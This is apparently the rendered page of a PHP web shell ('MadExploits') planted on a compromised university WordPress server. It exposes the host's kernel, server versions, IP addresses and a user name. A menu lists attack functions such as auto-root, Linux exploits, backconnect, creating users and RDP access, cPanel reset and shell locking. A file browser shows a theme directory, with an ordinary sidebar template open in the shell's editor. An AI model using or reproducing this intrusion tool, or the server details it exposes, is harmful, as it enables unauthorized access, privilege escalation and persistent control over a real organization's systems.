Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.133.136.117
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php /** * The template for the sidebar containing the main widget area * */ defined( 'ABSPATH' ) || exit; // Exit if accessed directly // Returen if the current page is full width or one column if( ! TIELABS_HELPER::has_sidebar() ){ return; } // Check if the sidebars is hidden on mobiles if( TIELABS_HELPER::is_mobile_and_hidden( 'sidebars' ) || ( tie_is_mobile() && tie_is_auto_loaded_post() ) ){ return; } // Sticky Sidebar $is_sticky = tie_get_option( 'sticky_sidebar' ) ? true : false; // Home Page if ( is_home() || is_front_page() ){ $sidebar = tie_get_option( 'sidebar_home' ); } // BuddyPress elseif( TIELABS_BUDDYPRESS_IS_ACTIVE && is_buddypress() ){ $sidebar = TIELABS_BUDDYPRESS::get_page_data( 'custom_sidebar' ); } // bbPress elseif ( TIELABS_BBPRESS_IS_ACTIVE && is_bbpress() ){ $sidebar = tie_get_option( 'sidebar_bbpress' ); } // Web Stories elseif( TIELABS_WEBSTORIES_IS_ACTIVE && is_post_type_archive( 'web-story' ) ){ $sidebar = tie_get_option( 'sidebar_web_stories' ); } // Pages elseif( is_page() ){ $sidebar = tie_get_object_option( 'sidebar_page', '', 'tie_sidebar_post' ); $is_sticky = tie_get_object_option( 'sticky_sidebar', '', 'tie_sticky_sidebar' ); } // Posts elseif ( is_single() ){ $sidebar = tie_get_object_option( 'sidebar_post', 'cat_posts_sidebar', 'tie_sidebar_post' ); $is_sticky = tie_get_object_option( 'sticky_sidebar', 'cat_posts_sticky_sidebar', 'tie_sticky_sidebar' ); } // Categories elseif ( is_category() ){ $sidebar = tie_get_object_option( 'sidebar_archive', 'cat_sidebar', '' ); $is_sticky = tie_get_object_option( 'sticky_sidebar', 'cat_sticky_sidebar', '' ); } // All Archives else{ $sidebar = tie_get_option( 'sidebar_archive' ); } // Default sidebar if there is no a custom sidebar if( empty( $sidebar ) || ( ! empty( $sidebar ) && ! TIELABS_HELPER::is_sidebar_registered( $sidebar ) ) ) { $sidebar = 'primary-widget-area'; } // Show the sidebar if contains Widgets if( is_active_sidebar( $sidebar ) ){ $sidebar_class = 'sidebar tie-col-md-4 tie-col-xs-12 normal-side'; if( $is_sticky && $is_sticky !== 'no' ){ $sidebar_class .= ' is-sticky'; } ?> <aside class="<?php echo esc_attr( $sidebar_class ) ?>" aria-label="<?php esc_html_e( 'Primary Sidebar', TIELABS_TEXTDOMAIN ); ?>"> <div class="theiaStickySidebar"> <?php dynamic_sidebar( sanitize_title( $sidebar ) ); ?> </div><!-- .theiaStickySidebar /--> </aside><!-- .sidebar /--> <?php }
Close